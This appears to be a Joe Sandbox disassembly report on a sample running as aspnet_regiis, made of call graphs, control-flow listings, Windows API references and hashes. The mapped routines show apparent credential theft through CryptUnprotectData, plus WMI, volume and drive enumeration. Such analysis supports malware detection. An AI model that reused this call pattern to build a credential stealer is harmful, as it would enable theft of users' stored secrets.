GetForegroundWindow 8711->8713 8714 938b4c 8711->8714 8712->8709 8715 938c7c 8713->8715 8714->8713 8715->8712 8717 93d260 CoInitializeEx 8715->8717 9135 9526e0 SHEmptyRecycleBinW 8950 948be3 8951 948be8 8950->8951 8951->8951 8952 96ff30 LdrInitializeThunk 8951->8952 8953 948e0d 8952->8953 8957 948e56 8953->8957 8959 948e9d 8953->8959 8972 970280 8953->8972 8957->8959 8960 949216 CryptUnprotectData 8957->8960 8962 949240 8957->8962 8966 970350 8957->8966 8976 96d920 LdrInitializeThunk 8957->8976 8958 9496c7 8961 94df00 3 API calls 8958->8961 8960->8957 8960->8959 8960->8962 8961->8959 8962->8958 8962->8959 8964 949505 8962->8964 8977 94df00 8962->8977 8964->8958 8964->8959 8964->8964 8965 9700e0 LdrInitializeThunk 8964->8965 8965->8964 8968 970380 8966->8968 8967 97046e 8967->8957 8970 9703ce 8968->8970 8989 96d920 LdrInitializeThunk 8968->8989 8970->8967 8990 96d920 LdrInitializeThunk 8970->8990 8974 9702b0 8972->8974 8973 9702fe 8973->8957 8974->8973 8991 96d920 LdrInitializeThunk 8974->8991 8976->8957 8978 94df50 8977->8978 8992 948490 8978->8992 8980 94e034 8980->8980 8981 948490 3 API calls 8980->8981 8982 94e0dc 8981->8982 8983 948490 3 API calls 8982->8983 8984 94e196 8983->8984 8985 948490 3 API calls 8984->8985 8986 94e24b 8985->8986 8987 948490 3 API calls 8986->8987 8988 94e2c8 8987->8988 8988->8964 8989->8970 8990->8967 8991->8973 8993 9484a0 8992->8993 8993->8993 8994 96ff30 LdrInitializeThunk 8993->8994 8997 94856e 8994->8997 8995 94864c 8995->8980 8996 948640 8996->8995 9001 970280 LdrInitializeThunk 8996->9001 9002 94869c 8996->9002 9004 9486cb 8996->9004 8997->8995 8997->8996 8998 948633 8997->8998 8997->9002 8997->9004 9007 969040 8997->9007 8998->8995 8998->8996 9000 96ff30 LdrInitializeThunk 8998->9000 8998->9002 8998->9004 9000->8996 9001->9002 9002->8995 9003 970350 LdrInitializeThunk 9002->9003 9002->9004 9003->9004 9004->8995 9024 96d920 LdrInitializeThunk 9004->9024 9006 94896d 9008 96ff30 LdrInitializeThunk 9007->9008 9009 96906b 9008->9009 9010 969132 9009->9010 9011 96907a 9009->9011 9013 96b030 RtlAllocateHeap 9009->9013 9016 9691be 9009->9016 9019 969090 9009->9019 9020 9691cb 9009->9020 9014 96b070 RtlFreeHeap 9010->9014 9011->8998 9013->9016 9022 969138 9014->9022 9015 96b030 RtlAllocateHeap 9015->9020 9016->9015 9019->9010 9019->9011 9025 96b630 9019->9025 9029 96b450 9019->9029 9033 96b700 9019->9033 9020->9019 9042 96d920 LdrInitializeThunk 9020->9042 9022->9011 9041 96d920 LdrInitializeThunk 9022->9041 9024->9006 9026 96b63a 9025->9026 9027 96b6ce 9025->9027 9026->9027 9043 96d920 LdrInitializeThunk 9026->9043 9027->9019 9030 96b552 9029->9030 9031 96b462 9029->9031 9030->9019 9031->9030 9044 96d920 LdrInitializeThunk 9031->9044 9034 96b7c3 9033->9034 9036 96b716 9033->9036 9034->9019 9035 96b91e 9035->9034 9037 96b630 LdrInitializeThunk 9035->9037 9036->9034 9039 96b7be 9036->9039 9045 96d920 LdrInitializeThunk 9036->9045 9037->9034 9039->9035 9046 96d920 LdrInitializeThunk 9039->9046 9041->9011 9042->9019 9043->9027 9044->9030 9045->9039 9046->9035 9334 95276c 9335 9527d2 9334->9335 9336 9528a0 3 API calls 9335->9336 9337 9527ea 9336->9337 9248 93dde9 9252 931bb0 9248->9252 9253 931bbe 9252->9253 9254 9517e9 9255 951803 9254->9255 9256 96ff30 LdrInitializeThunk 9255->9256 9257 951925 9256->9257

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 9689d0-968a34 1 968a40-968a9b 0->1 1->1 2 968a9d-968ab9 1->2 4 968ac6-968b14 CoCreateInstance 2->4 5 968abb 2->5 6 968f56-968f7b call 96f550 GetVolumeInformationW 4->6 7 968b1a-968b5b 4->7 5->4 12 968f85-968f87 6->12 13 968f7d-968f81 6->13 9 968b60-968b9c 7->9 9->9 11 968b9e-968bc9 SysAllocString 9->11 18 968f45-968f52 SysFreeString 11->18 19 968bcf-968be9 CoSetProxyBlanket 11->19 14 968f9f-968fa6 12->14 13->12 16 968fb2-968fff call 94f900 14->16 17 968fa8-968faf 14->17 26 969000-96900b 16->26 17->16 18->6 21 968bef-968c08 19->21 22 968f3b-968f41 19->22 23 968c10-968c4d 21->23 22->18 23->23 25 968c4f-968cd5 SysAllocString 23->25 27 968ce0-968d12 25->27 26->26 28 96900d-969019 26->28 27->27 29 968d14-968d39 SysAllocString 27->29 30 968f90-968f99 28->30 31 96901f-96902f call 938400 28->31 36 968f25-968f37 SysFreeString * 2 29->36 37 968d3f-968d61 29->37 30->14 33 969034-96903b 30->33 31->30 36->22 39 968d67-968d6a 37->39 40 968f1b-968f21 37->40 39->40 41 968d70-968d75 39->41 40->36 41->40 42 968d7b-968dd1 VariantInit 41->42 43 968de0-968e1c 42->43 43->43 44 968e1e-968e33 43->44 45 968e37-968e39 44->45 46 968f03-968f14 VariantClear 45->46 47 968e3f-968e45 45->47 46->40 47->46 48 968e4b-968e58 47->48 49 968e9d 48->49 50 968e5a-968e5f 48->50 53 968e9f-968ec6 call 938380 call 95ec40 49->53 52 968e7c-968e80 50->52 54 968e82-968e8b 52->54 55 968e70 52->55 64 968ecd-968edd 53->64 65 968ec8 53->65 58 968e92-968e96 54->58 59 968e8d-968e90 54->59 57 968e71-968e7a 55->57 57->52 57->53 58->57 61 968e98-968e9b 58->61 59->57 61->57 66 968ee4-968f00 call 9383b0 call 938390 64->66 67 968edf 64->67 65->64 66->46 67->66
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00973678,00000000,00000001,00973668,00000000), ref: 00968B0C
                                                                                            • SysAllocString.OLEAUT32(79CB7BB2), ref: 00968BA3
                                                                                            • CoSetProxyBlanket.COMBASE(00006F68,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00968BE1
                                                                                            • SysAllocString.OLEAUT32(79CB7BB2), ref: 00968C50
                                                                                            • SysAllocString.OLEAUT32(79CB7BB2), ref: 00968D15
                                                                                            • VariantInit.OLEAUT32(?), ref: 00968D80
                                                                                            • VariantClear.OLEAUT32(?), ref: 00968F04
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00968F2F
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00968F35
                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00968F46
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                            • String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
                                                                                            • API String ID: 2485776651-621965088
                                                                                            • Opcode ID: 85eeae270b505bd1e63c061715c95d1d44c35a4ddc93442be1265c6026ef1940
                                                                                            • Instruction ID: 3f090b4a402fdf0df92aa25e2bb6800b90765d11932eeccf3a19eb4646e38752
                                                                                            • Opcode Fuzzy Hash: 85eeae270b505bd1e63c061715c95d1d44c35a4ddc93442be1265c6026ef1940
                                                                                            • Instruction Fuzzy Hash: B5F1ED726083019FD320DF65C885B5BBBE9EFC4714F148A2CF5959B290DB75D906CB82

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 209 948be3-948bf7 call 938390 212 948bfd-948c02 209->212 213 948cbe 209->213 214 948cc5-948d29 call 938380 212->214 213->214 217 948d30-948d98 214->217 217->217 218 948d9a-948da6 217->218 219 948dc1-948dd1 218->219 220 948da8-948daf 218->220 222 948df1-948e15 call 96ff30 219->222 223 948dd3-948dda 219->223 221 948db0-948dbf 220->221 221->219 221->221 227 948eb4-948eb6 222->227 228 948e37-948e3d call 938390 222->228 229 948ed7-948edd call 938390 222->229 230 948e31 222->230 231 948e1c 222->231 232 948e9d 222->232 233 948ebb-948ecf call 931000 222->233 234 948ea5 222->234 235 948e40-948e62 call 970280 222->235 236 948ee0-948efa 222->236 237 948e22-948e28 call 938390 222->237 238 948e69-948e89 call 938380 call 970350 222->238 239 948eab-948eb1 call 938390 222->239 224 948de0-948def 223->224 224->222 224->224 244 94c6fc-94c703 227->244 228->235 229->236 230->228 231->237 232->234 233->229 234->239 235->229 235->232 235->233 235->236 235->238 248 948f00-948f26 236->248 237->230 263 948e8e-948e96 238->263 239->227 248->248 249 948f28-948f30 248->249 257 948f32-948f41 249->257 258 948f7a-948fe3 call 931940 249->258 261 948f50-948f57 257->261 272 948ff0-949030 258->272 264 948f60-948f66 261->264 265 948f59-948f5c 261->265 263->229 263->232 263->233 263->236 267 949060-949062 263->267 268 949240 263->268 269 949252-9492d1 263->269 264->258 271 948f68-948f77 call 96d920 264->271 265->261 270 948f5e 265->270 273 949070-949076 267->273 277 949246-94924f call 938390 268->277 274 9492e0-94935a 269->274 270->258 271->258 272->272 276 949032-949059 call 931a80 272->276 273->273 278 949078-9490a0 273->278 274->274 279 94935c-94937a call 931a80 274->279 276->267 276->268 276->269 277->269 283 9490a7 278->283 284 9490a2-9490a5 278->284 292 949394-9493ef 279->292 293 949381-94938d 279->293 288 9490a8-9490b4 283->288 284->283 284->288 290 9490b6-9490b9 288->290 291 9490bb 288->291 290->291 294 9490bc-9490d6 call 938380 290->294 291->294 295 9493f0-949415 292->295 293->269 293->277 293->292 293->293 300 9490dc-9490e3 294->300 301 9491da-949239 call 96f550 CryptUnprotectData 294->301 295->295 297 949417-94943b call 931ab0 295->297 305 949534-949539 297->305 306 949574-94958b call 931af0 297->306 307 949515-949525 call 931bb0 297->307 308 9496b3-9496c0 297->308 309 949726-94972e 297->309 310 949706-94970f call 938390 297->310 311 9496c7-9496fe call 94df00 297->311 312 949720 297->312 313 9497a0 297->313 314 949540-949549 call 938390 297->314 315 949442-949481 297->315 316 94954c-94955c 297->316 317 94952e 297->317 318 94976b-949773 297->318 304 949100-949146 call 94ed80 * 2 300->304 301->229 301->232 301->233 301->236 301->238 301->267 301->268 301->269 352 9490f0-9490fa 304->352 353 949148-949163 call 94ed80 304->353 324 94955d-94956d call 931ae0 305->324 346 9495e0 306->346 347 94958d-949592 306->347 307->317 308->309 308->310 308->311 308->312 308->313 308->314 308->316 308->317 308->318 330 949730-949734 309->330 331 949751-949756 309->331 310->312 311->310 313->244 314->316 320 949490-9494aa 315->320 316->324 317->305 321 949775-949779 318->321 322 949760 318->322 320->320 333 9494ac-949511 call 94df00 320->333 334 949780-94978f 321->334 322->318 324->306 324->307 324->308 324->309 324->310 324->311 324->312 324->313 324->314 324->316 324->317 324->318 341 949740-94974f 330->341 331->318 333->307 334->334 344 949791 334->344 341->331 341->341 344->322 351 9495e2-9495ea 346->351 350 9495a9-9495b7 347->350 354 9495a0 350->354 355 9495b9-9495bb 350->355 356 949600 351->356 357 9495ec-9495f1 351->357 352->301 352->304 353->352 366 949165-94918e 353->366 360 9495a1-9495a7 354->360 355->354 361 9495bd-9495c8 355->361 358 949607-94962b call 938380 call 93ad30 356->358 357->358 373 949631-949646 call 938380 358->373 374 94962d-94962f 358->374 360->350 360->351 361->354 364 9495ca-9495d3 361->364 364->360 367 9495d5-9495d8 364->367 369 949194-9491aa call 94ed80 366->369 370 9490e9-9490ef 366->370 367->360 377 9490e5 369->377 378 9491b0-9491d5 369->378 370->352 380 949661-949673 373->380 381 949648-94964f 373->381 374->373 377->370 378->352 383 949675-949678 380->383 384 949691-94969f call 9700e0 380->384 382 949650-94965f 381->382 382->380 382->382 385 949680-94968f 383->385 387 9496a4-9496ac 384->387 385->384 385->385 387->308 387->309 387->310 387->311 387->312 387->313 387->314 387->316 387->317 387->318
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$7654$??;4$^$z
                                                                                            • API String ID: 0-2567570624
                                                                                            • Opcode ID: d964275af12f0bd879cb3fdff101d30d8cd372dba2673852a5692c08d3ffdc43
                                                                                            • Instruction ID: 4e2a5882f942daa3b998b6c7f6a93c35ecd7a8a1fec18bc1a214588be5a206d0
                                                                                            • Opcode Fuzzy Hash: d964275af12f0bd879cb3fdff101d30d8cd372dba2673852a5692c08d3ffdc43
                                                                                            • Instruction Fuzzy Hash: 4B4204B6A183418BD724CF24D891BAFB7E6FFC9304F08492DE48987392E7359915CB52

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 388 93e2b2-93e2f2 call 963710 call 939ba0 CoUninitialize 393 93e300-93e319 388->393 393->393 394 93e31b-93e338 393->394 395 93e340-93e3a2 394->395 395->395 396 93e3a4-93e414 395->396 397 93e420-93e43a 396->397 397->397 398 93e43c-93e44d 397->398 399 93e46b-93e475 398->399 400 93e44f-93e45f 398->400 402 93e477-93e478 399->402 403 93e48b-93e498 399->403 401 93e460-93e469 400->401 401->399 401->401 404 93e480-93e489 402->404 405 93e4bb-93e4c3 403->405 406 93e49a-93e4a1 403->406 404->403 404->404 408 93e4c5-93e4c6 405->408 409 93e4db-93e4e5 405->409 407 93e4b0-93e4b9 406->407 407->405 407->407 412 93e4d0-93e4d9 408->412 410 93e4e7-93e4eb 409->410 411 93e4fb-93e507 409->411 413 93e4f0-93e4f9 410->413 414 93e521-93e644 411->414 415 93e509-93e50b 411->415 412->409 412->412 413->411 413->413 417 93e650-93e66a 414->417 416 93e510-93e51d 415->416 416->416 418 93e51f 416->418 417->417 419 93e66c-93e689 417->419 418->414 420 93e690-93e6db 419->420 420->420 421 93e6dd-93e722 call 93bf40 420->421
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: Uninitialize
                                                                                            • String ID: (/")$<W$ET$inzB$lhrZ$whv`
                                                                                            • API String ID: 3861434553-2446375791
                                                                                            • Opcode ID: 55b7f771962393f72b102a76498816e7c969575340022cb6e5d78c4cf2f39161
                                                                                            • Instruction ID: 1b1cc3ffb83dce28ce942ec8d1930597c0e6c975c0aa3592929cd2da5089052c
                                                                                            • Opcode Fuzzy Hash: 55b7f771962393f72b102a76498816e7c969575340022cb6e5d78c4cf2f39161
                                                                                            • Instruction Fuzzy Hash: 99A1EDB060C3D28BD3358F2594917EBBFE1ABA6308F18896CD4D95B286D7780546CF92

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 424 938ae0-938af1 call 96c680 427 938af7-938b0f SHGetSpecialFolderPathW call 965ea0 424->427 428 938d34-938d36 ExitProcess 424->428 431 938b15-938b4a GetCurrentThreadId GetCurrentProcessId 427->431 432 938d2f call 96d860 427->432 434 938b54-938c76 GetForegroundWindow 431->434 435 938b4c-938b52 431->435 432->428 436 938d0b-938d23 call 93a0f0 434->436 437 938c7c-938ced 434->437 435->434 436->432 442 938d25 call 93d260 436->442 438 938cf3-938d09 437->438 439 938cef-938cf1 437->439 438->436 439->438 444 938d2a call 93bf10 442->444 444->432
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00938B02
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00938B15
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00938B1D
                                                                                            • GetForegroundWindow.USER32 ref: 00938C6E
                                                                                            • ExitProcess.KERNEL32 ref: 00938D36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                            • String ID:
                                                                                            • API String ID: 4063528623-0
                                                                                            • Opcode ID: 1b48d64e817c60132a3f7f29a1a63187a0c918cb70bc4ea82be57d5cba15beb2
                                                                                            • Instruction ID: 40a4bab26c26d37f49db6a0120448c5828ea850ed8327f471a91f4343192981a
                                                                                            • Opcode Fuzzy Hash: 1b48d64e817c60132a3f7f29a1a63187a0c918cb70bc4ea82be57d5cba15beb2
                                                                                            • Instruction Fuzzy Hash: 52512333B5471447C708EEBECC8139AB6D79BC8610F0E853CA888DB395EAB49C0986C1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 450 954470-9544cf 451 9544d0-954532 450->451 451->451 452 954534-954588 451->452 454 954590-9545fb 452->454 454->454 455 9545fd-95460b 454->455 456 954665-954671 455->456 457 954654 455->457 458 9547c6-954885 455->458 459 9547c0 455->459 460 9547b0-9547b7 455->460 461 954612-954618 455->461 462 954672-95467b 455->462 463 95465c-954662 call 938390 455->463 457->463 466 954890-9548ea 458->466 460->459 464 954621 461->464 465 95461a-95461f 461->465 468 954684 462->468 469 95467d-954682 462->469 463->456 471 954624-95464d call 938380 464->471 465->471 466->466 472 9548ec-95490a call 9528a0 466->472 470 95468b-9546cf call 938380 468->470 469->470 480 9546d0-95472d 470->480 471->456 471->457 471->458 471->459 471->460 471->462 471->463 483 95492d-9549f7 call 938380 472->483 480->480 481 95472f-95473a 480->481 484 954761-95476e 481->484 485 95473c-954741 481->485 492 954a00-954a14 483->492 488 954791-95479c call 9700e0 484->488 489 954770-954774 484->489 487 954750-95475f 485->487 487->484 487->487 495 9547a1-9547a9 488->495 491 954780-95478f 489->491 491->488 491->491 492->492 494 954a16-954a1e 492->494 496 954a41-954a4e 494->496 497 954a20-954a25 494->497 495->458 495->459 495->460 495->483 498 954a8a-954a98 495->498 502 954a71-954a87 GetLogicalDrives call 9700e0 496->502 503 954a50-954a54 496->503 501 954a30-954a3f 497->501 499 954a9f-954b4e call 938380 498->499 500 954a9a 498->500 509 954b50-954b64 499->509 500->499 501->496 501->501 502->498 504 954a60-954a6f 503->504 504->502 504->504 509->509 510 954b66-954b6e 509->510 511 954b91-954b9e 510->511 512 954b70-954b75 510->512 514 954bc1-954bd7 GetLogicalDrives call 9700e0 511->514 515 954ba0-954ba4 511->515 513 954b80-954b8f 512->513 513->511 513->513 517 954bb0-954bbf 515->517 517->514 517->517
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \]
                                                                                            • API String ID: 0-1108159982
                                                                                            • Opcode ID: 7758ee46e8cdaaf7a89c640ac9aaf0fa17c41cdcfc7e7aaa5157a0d6d4d84103
                                                                                            • Instruction ID: f511b1d9c647407144841f02ccdf7fa71dd9c5c5f2908701944ce537213f63d0
                                                                                            • Opcode Fuzzy Hash: 7758ee46e8cdaaf7a89c640ac9aaf0fa17c41cdcfc7e7aaa5157a0d6d4d84103
                                                                                            • Instruction Fuzzy Hash: 7402EFB66083418BD314CF69D89176BBBE5EFC5318F04892CE9D98B251E778C949CB82

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 662 96d880-96d895 663 96d8f6-96d8ff call 96b030 662->663 664 96d901-96d90a call 96b070 662->664 665 96d89c-96d8a3 662->665 666 96d8aa-96d8bf 662->666 674 96d90f-96d912 663->674 673 96d90c 664->673 665->664 665->666 667 96d8c0-96d8df 666->667 667->667 670 96d8e1-96d8f4 RtlReAllocateHeap 667->670 670->673 673->674
                                                                                            APIs
                                                                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0096D8EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 264a2b946c741224b3ec851d17216a5a1b4c15474d0f17bf632f55f0e8be6dfb
                                                                                            • Instruction ID: abb48cab0f54707cfe323d70cca8af99c2f652bb5acab46abe374651b93ecf43
                                                                                            • Opcode Fuzzy Hash: 264a2b946c741224b3ec851d17216a5a1b4c15474d0f17bf632f55f0e8be6dfb
                                                                                            • Instruction Fuzzy Hash: 4A014CB2F1B201CBD314AF75EC55B2BBB66EFC6300F08893CE88093241E635C8558392
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(00941AA3), ref: 0096D94E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0096B0F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 8c075cb0b875ae913142121fe7c468857f3fc7aa40737c2c7afd35b68d7e581c
                                                                                            • Instruction ID: b0496bd7789ee73a0d6a9e1dc3f9bfe53ddf4da4d0fb2bbbca3e6211328e46d1
                                                                                            • Opcode Fuzzy Hash: 8c075cb0b875ae913142121fe7c468857f3fc7aa40737c2c7afd35b68d7e581c
                                                                                            • Instruction Fuzzy Hash: F2017872B283518FC7089B64ECA5B2B7FA5EFC1305F0A803DDA81876A0E7B05814D7D2
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0096B060
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: e303749e0a01cf48d7d74b39f086389fd45ee773988932107eebee98a530c35c
                                                                                            • Instruction ID: fef6fd1876446743f7d7bc671757800b52f19a135832f331aa1e7c3c835d36cb
                                                                                            • Opcode Fuzzy Hash: e303749e0a01cf48d7d74b39f086389fd45ee773988932107eebee98a530c35c
                                                                                            • Instruction Fuzzy Hash: 61E04F3420C7408BD7495B2898A1A6BBFA6EB9A720F20166CE0D2936F1C7229856DA05
                                                                                            APIs
                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0093D2A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.1880765848.0000000000931000.00000020.00000400.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                                                                                            • Associated: 00000002.00000002.1880741665.0000000000930000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880804917.0000000000972000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880828747.0000000000975000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.1880851201.0000000000987000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_930000_aspnet_regiis.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeSecurity
                                                                                            • String ID:
                                                                                            • API String ID: 640775948-0
